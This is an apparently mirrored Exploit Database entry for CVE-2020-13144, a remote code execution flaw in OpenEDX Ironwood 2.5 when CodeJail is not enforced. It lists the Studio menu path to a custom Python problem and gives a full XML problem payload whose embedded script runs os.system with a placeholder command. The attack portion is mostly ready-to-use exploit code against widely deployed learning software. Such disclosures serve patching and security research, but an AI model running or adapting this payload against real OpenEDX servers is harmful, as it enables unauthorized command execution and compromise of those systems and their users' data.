OpenEDX platform Ironwood 2.5 – Remote Code Execution

• Exploit Database
• 38 阅读

• 作者： Daniel Monzón
  日期： 2020-05-21
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/48500/

• # Exploit Title: OpenEDX platform Ironwood 2.5 - Remote Code Execution
  # Google Dork: N/A
  # Date: 2020-05-20
  # Exploit Author: Daniel Monzón (stark0de)
  # Vendor Homepage: https://open.edx.org/
  # Software Link: https://github.com/edx/edx-platform
  # Version: Ironwood 2.5
  # Tested on: Debian x64
  # CVE : CVE-2020-13144
  
  CVE ID: CVE-2020-13144
  
  OpenEDX Platform Ironwood version 2.5 suffers from a RCE vulnerability when the use of CodeJail (https://github.com/edx/codejail) is not enforced
  
  This is an authenticated vulnerability, so you need to register an account, go to /edx-studio
  
  Then Create New course > New section > New subsection > New unit > Add new component > Problem button > Advanced tab > Custom Python evaluated code
  
  Once here we just need to edit the problem and introduce a payload such as:
  
  <problem>
  
  <script type="python">
  def test_add(expect,ans):
  import os
  os.system("thecommandyouwanttoexecute")
  
  </script>
  
  <p>Problem text</p>
  <customresponse cfn="test_add" expect="20">
  <textline size="10" correct_answer="11" label="Integer #1"/><br/>
  <textline size="10" correct_answer="9" label="Integer #2"/>
  </customresponse>
  
  <solution>
  <div class="detailed-solution">
  <p>Solution or Explanation Heading</p>
  <p>Solution or explanation text</p>
  </div>
  </solution>
  </problem>
  
  And click Submit, and you will execute commands in the machine